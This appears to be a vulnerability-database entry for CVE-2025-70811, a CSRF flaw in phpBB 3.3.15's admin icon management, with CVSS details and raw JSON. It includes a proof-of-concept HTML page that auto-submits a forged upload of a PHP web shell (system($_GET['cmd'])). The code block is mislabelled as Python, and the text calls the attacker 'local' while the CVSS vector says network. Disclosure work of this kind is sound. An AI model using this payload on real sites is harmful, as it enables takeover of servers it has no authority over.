Security Vulnerability Report
中文
CVE-2025-70811 CVSS 4.3 MEDIUM

CVE-2025-70811

Published: 2026-04-09 15:16:09
Last Modified: 2026-04-17 13:05:33

Description

Cross Site Request Forgery vulnerability in Phpbb phbb3 v.3.3.15 allows a local attacker to execute arbitrary code via the Admin Control Panel icon management functionality.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phpbb:phpbb:3.3.15:-:*:*:*:*:*:* - VULNERABLE
phpBB 3.3.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for CVE-2025-70811 --> <!-- Exploit CSRF in ACP Icon Management --> <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://target-site/phpBB/adm/index.php?i=acp_icons&mode=icons&action=add", true); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundary"); // Payload to upload malicious icon or modify settings var body = "------WebKitFormBoundary\r\n"; body += "Content-Disposition: form-data; name=\"icon\"; filename=\"shell.php\"\r\n"; body += "Content-Type: image/jpeg\r\n\r\n"; body += "<?php system($_GET['cmd']); ?>\r\n"; body += "------WebKitFormBoundary--\r\n"; xhr.send(body); } // Auto trigger on load window.onload = submitRequest; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-70811", "sourceIdentifier": "[email protected]", "published": "2026-04-09T15:16:09.163", "lastModified": "2026-04-17T13:05:33.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Request Forgery vulnerability in Phpbb phbb3 v.3.3.15 allows a local attacker to execute arbitrary code via the Admin Control Panel icon management functionality."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpbb:phpbb:3.3.15:-:*:*:*:*:*:*", "matchCriteriaId": "0F92D845-DF72-48D5-9BF6-CD8E0736A08D"}]}]}], "references": [{"url": "https://github.com/ariefibis", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/ariefibis/PHPBB/security/advisories/GHSA-56pv-xg3w-6822", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}, {"url": "https://www.linkedin.com/in/mohammed-a-6a2548112/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}